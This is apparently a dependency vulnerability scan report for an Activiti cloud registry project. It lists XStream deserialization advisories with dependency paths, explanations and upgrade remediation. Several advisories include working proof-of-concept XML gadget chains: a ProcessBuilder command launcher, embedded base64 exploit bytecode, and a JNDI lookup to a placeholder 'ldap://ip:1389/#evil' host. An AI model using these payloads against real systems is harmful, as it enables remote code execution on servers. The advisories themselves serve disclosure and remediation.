    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.

This issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

Note: 1.4.14-jdk7is optimised for OpenJDK 7, release 1.4.14 are compatible with other JDK projects.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.14 or higher.

References

Deserialization of Untrusted Data vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>
        <outer-class>
          <verbose>0</verbose>
          <effort>0</effort>
          <optDumpBands>false</optDumpBands>
          <optDebugBands>false</optDebugBands>
          <optVaryCodings>false</optVaryCodings>
          <optBigStrings>false</optBigStrings>
          <isReader>false</isReader>
          <bandHeaderBytePos>0</bandHeaderBytePos>
          <bandHeaderBytePos0>0</bandHeaderBytePos0>
          <archiveOptions>0</archiveOptions>
          <archiveSize0>0</archiveSize0>
          <archiveSize1>0</archiveSize1>
          <archiveNextCount>0</archiveNextCount>
          <attrClassFileVersionMask>0</attrClassFileVersionMask>
          <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>
            <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                <default>
                  <__name>Pwnr</__name>
                  <__bytecodes>
                    <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>
                    <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
                  </__bytecodes>
                  <__transletIndex>-1</__transletIndex>
                  <__indentNumber>0</__indentNumber>
                </default>
              </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
            </bean>
            <localCache>
              <methods>
                <entry>
                  <string>getOutputProperties</string>
                  <list>
                    <method>
                      <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
                      <name>getOutputProperties</name>
                      <parameter-types/>
                    </method>
                  </list>
                </entry>
              </methods>
            </localCache>
          </attrIndexTable>
          <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>
        </outer-class>
      </comparator>
    </default>
    <int>3</int>
    <string-array>
      <string>yxxx</string>
      <string>outputProperties</string>
    </string-array>
    <string-array>
      <string>yxxx</string>
    </string-array>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
                          <class>javax.naming.InitialContext</class>
                          <name>doLookup</name>
                          <parameter-types>
                            <class>java.lang.String</class>
                          </parameter-types>
                        </method>
                      </val_-setter>
                      <outer-class>
                        <propertySetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field>
                                <name>serialPersistentFields</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>java.util.Comparator</type>
                              <field>
                                <name>CASE_INSENSITIVE_ORDER</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>long</type>
                              <field>
                                <name>serialVersionUID</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[C</type>
                              <field>
                                <name>value</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>int</type>
                              <field reference='../../../../../val_-getter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                        </propertySetters>
                        <propertyGetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>java.util.Comparator</type>
                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>long</type>
                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[C</type>
                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
                          </entry>
                        </propertyGetters>
                        <elementLocalNameCollision>false</elementLocalNameCollision>
                        <contentClass>java.lang.String</contentClass>
                        <elementDeclaredTypes/>
                      </outer-class>
                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                  </accessors>
                  <wrapper>java.lang.Object</wrapper>
                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
                  <dynamicWrapper>false</dynamicWrapper>
                </bodyBuilder>
                <isOneWay>false</isOneWay>
              </com.sun.xml.internal.ws.client.sei.StubHandler>
            </entry>
          </stubHandlers>
          <clientConfig>false</clientConfig>
        </databinding>
        <methodHandlers>
          <entry>
            <method reference='../../../databinding/stubHandlers/entry/method'/>
            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
              <owner reference='../../../..'/>
              <method reference='../../../../databinding/stubHandlers/entry/method'/>
              <isVoid>false</isVoid>
              <isOneway>false</isOneway>
            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
          </entry>
        </methodHandlers>
      </handler>
    </dynamic-proxy>
    <string>ldap://ip:1389/#evil</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
      <default>
        <__name>Pwnr</__name>
        <__bytecodes>
          <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClM